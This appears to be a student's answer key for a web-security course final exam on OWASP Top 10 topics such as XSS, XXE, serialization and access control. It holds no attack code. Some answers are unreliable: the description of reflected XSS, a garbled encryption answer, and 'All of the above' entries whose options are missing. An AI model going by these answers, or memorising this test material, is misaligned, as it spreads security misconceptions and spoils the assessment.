CIS 168 Final
Which of the following is true for Reflect XSS?
Affects the code of the client in the browser directly.
What can lead to insufficient logging and monitoring?
All of the above.
What is considered a best practice when identifying components with known vulnerabilities?
All of the above.
How is insecure serialization used?
All of the answers provided
Why is it so hard to implement access controls properly in the first place?
All of these answers.
Which of the following can lead to sensitive data exposure?
Both are correct.
What is the best source to identify vulnerabilities?
CVE from Mitre
What does it mean to "harden" a software environment?
Change default configurations to more secure settings.
What tool is recommended for XSS Protection?
Content Security Policy
What is Serialization?
Converting an object into a byte stream (data).
What is Deserialization?
Converting data to an object.
What type of attack depends on entering JavaScript into a text area that is intended for users to enter text that will be viewed by other users?
Cross-site scripting
What are the two types of XXE?
Direct and Indirect
What is the best way to defend against XXE?
Disable external entities in your XML parser.
What is the key to encryption, hashing, and encoding when securing your sensitive data?
Envryption can be decrypted using the right key.
What is XML?
Extensible Markup Language
Authentication and authorization both refer to the same concept--access control.
False
Deserialization is the process of converting an object into a data format, something like XML or JSON, with the intent of putting it back together later.
False
If you encrypt application data in motion, you don't need to encrypt that data at rest.
False
The damage an attacker can inflict by exploiting broken access control flaws is likely to be minimal.
False
Approximately how many entries does the US National Vulnerability Database contain?
More than 120,000
Which of the following is true about Stored XSS?
Most difficult to detect
Which of the following is true about DOM-based XSS?
Never requires interaction with the server
Which of the following is not an XSS attack category?
OS-based
What is an Indirect XXE?
Results of some forms of requests where the server generates an XML object.
How is XML similiar to HTML?
Tag-based syntax is used.
Which of the following is not a type of cross-site scripting (XSS) flaw?
Transparent
By uploading an XML file that contains hostile content, an attacker could potentially launch multiple attacks from the XML processor that handles the file.
True
Security misconfiguration weaknesses extend beyond the application.
True
Security tools can be used to help assess configurations automatically.
True
The OWASP Top 10 Project is the most mature, most popular project in the OWASP project library.
True
The best way to protect your apps from components with known vulnerabilities is to remove everything you don't need.
True
The ideal setting to test for insufficient logging and monitoring vulnerabilities is a white box testing scenario.
True
What is Direct XXE?
XML object sent to the server with an external entity flag.
It's not enough to simply identify the standards that should be applied in order to harden your software environments. You also have to _____.
ensure those hardening standards are applied each and every time.
